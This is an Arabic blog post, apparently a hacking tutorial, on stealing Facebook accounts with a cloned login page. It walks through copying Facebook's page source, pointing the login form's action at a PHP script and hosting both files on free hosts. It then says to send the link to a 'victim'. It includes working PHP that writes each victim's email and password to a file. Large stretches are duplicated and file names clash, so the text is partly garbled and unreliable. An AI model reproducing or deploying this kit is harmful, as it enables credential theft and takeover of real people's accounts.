. هي الطريقة الأكثر شيوعا والأسهل في اختراق حساب الفيسبوك لشخص ما "Phishing"تقنية ال
في هذا الموضوع سوف أقوم بشرح هذه التقنية وذلك باظهار كيفية صنع الصفحة الرئيسية الوهمية أو الإفتراضية
.ومن ثم استعمال هذه الصفحة لإصطياد الضحية"Home Page" للفيسبوك
: لأي موقع لا بد لك من توفر ثلاث ملفات مشتركة "Phishing" لصنع صفحة
: وهي
(الصفحة الوهمية) HTML ملف
(لتتبع التفاصيل داخل الصفحة التي أنشأتها) PHP ملف
(لحفظ جميع المعلومات في شكل نص) Txt ملف
كيف تنشأ صفحة فيسبوك وهمية ؟
(تأكد من تمام عملية تحميل الصفحة كاملة) "login page" أولا. توجّه إلى الصفحة الرئيسية للفيسبوك
"view page source" ثم اضغط في أي مكان بزر الماوس الأيمن ومن القائمة التي تظهر اختر
لإختيار جميع الصفحة ثم قم بعمليتي نسخ ولصق ( CTRL + A ) ثانيا. من لوحة المفاتيح اضغط على المفتاحين
notepadلجميع أكواد هذه الصفحة على ال
: وسوف تعثر على الكود التالي "action" للبحث عن الكلمة (CTRL + F) ثالثا. اضغط على المفتاحين
action="https://www.facebook.com/login.php?login_attempt=1"
: رابعا. استبدل الكود المبين أعلاه بالكود التالي
action="speeed04.php"
(anyname.php) أو speeed04.php بعدما استبدلته إلى
(anyname.html) أو facebook.html لحفظ هذا الملف بامتداد (CTRL + S) اضغط على المفناح
!!وبانتهائنا من هذه الخطوات تكون صفحتنا الوهمية جاهزة
PHP خامسا. الآن نأتي إلى انشاء الملف الثاني وهو ملف
notepadالتالي ثم الصقه على محرر ال PHPوببساطة لإنشاء هذا الملف قم بنسخ كود ال
(speeed04.php احفظه بالإمتداد الذي اخترته سابقا (في مثالنا السابق اخترنا الإمتداد notepadبعد لصقه على ال
"connection" الإيميل والباسوورد) ثم الضغط على)
PHP وبتمام هذه الخطوة نكون قد اتممنا انشاء ملف
سادسا. الآن سجّل في احدى المواقع ذات الإستضافات المجانية
: مثلا
my3gb.com
t35.com
110mb.com
أو
ripway
أو
drivehq
.
.
الخ
: سابعا. بعد تسجيلك في إحدى هذه المواقع المجانية قم باضافة الملفين التاليين إلى الموقع
facebook.html
speeed04.php
(directory) تأكد من أن هذان الملفان في نفس المجلّد
ثامنا. بعد استضافة هاذان الملفان في الموقع المجاني سوف تحصل على رابط مباشر للصفحة الوهمية التي أنشأتها
. (facebook.html سابقا (صفحة
تاسعا. استخدم هذا اللينك أو الرابط لإرساله إلى الضحية. وبمجرّد ما يدخل الإيميل والباسوورد الخاصة بحسابه
سوف تظهر صفحة جديدة آليا على نفس المجلّد تحمل اسم"connection" على الصفحة الوهمية ويضغط على
. تحتوي على كلا من اسم المستخدم وباسوورد الضحية (password.html) الصفحة
action="https://www.facebook.com/login.php?login_attempt=1"
: رابعا. استبدل الكود المبين أعلاه بالكود التالي
action="speeed04.php"
(anyname.php) أو speeed04.php بعدما استبدلته إلى
(anyname.html) أو facebook.html لحفظ هذا الملف بامتداد (CTRL + S) اضغط على المفناح
!!وبانتهائنا من هذه الخطوات تكون صفحتنا الوهمية جاهزة
PHP خامسا. الآن نأتي إلى انشاء الملف الثاني وهو ملف
notepadالتالي ثم الصقه على محرر ال PHPوببساطة لإنشاء هذا الملف قم بنسخ كود ال
(speeed04.php احفظه بالإمتداد الذي اخترته سابقا (في مثالنا السابق اخترنا الإمتداد notepadبعد لصقه على ال
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
!!ما يجب أن تعلمه
هو الرابط الذي يقوم بتوجيه الضحية بمجرّد ادخال معلومتي تسجيل الدخول‘http://www.facebook.com‘"connection" الإيميل والباسوورد) ثم الضغط على)
PHP وبتمام هذه الخطوة نكون قد اتممنا انشاء ملف
سادسا. الآن سجّل في احدى المواقع ذات الإستضافات المجانية
: مثلا
my3gb.com
t35.com
110mb.com
أو
ripway
أو
drivehq
.
.
الخ
: سابعا. بعد تسجيلك في إحدى هذه المواقع المجانية قم باضافة الملفين التاليين إلى الموقع
facebook.html
speeed04.php
(directory) تأكد من أن هذان الملفان في نفس المجلّد
ثامنا. بعد استضافة هاذان الملفان في الموقع المجاني سوف تحصل على رابط مباشر للصفحة الوهمية التي أنشأتها
. (facebook.html سابقا (صفحة
تاسعا. استخدم هذا اللينك أو الرابط لإرساله إلى الضحية. وبمجرّد ما يدخل الإيميل والباسوورد الخاصة بحسابه
سوف تظهر صفحة جديدة آليا على نفس المجلّد تحمل اسم"connection" على الصفحة الوهمية ويضغط على
. تحتوي على كلا من اسم المستخدم وباسوورد الضحية (password.html) الصفحة
.jpg)
ليست هناك تعليقات:
إرسال تعليق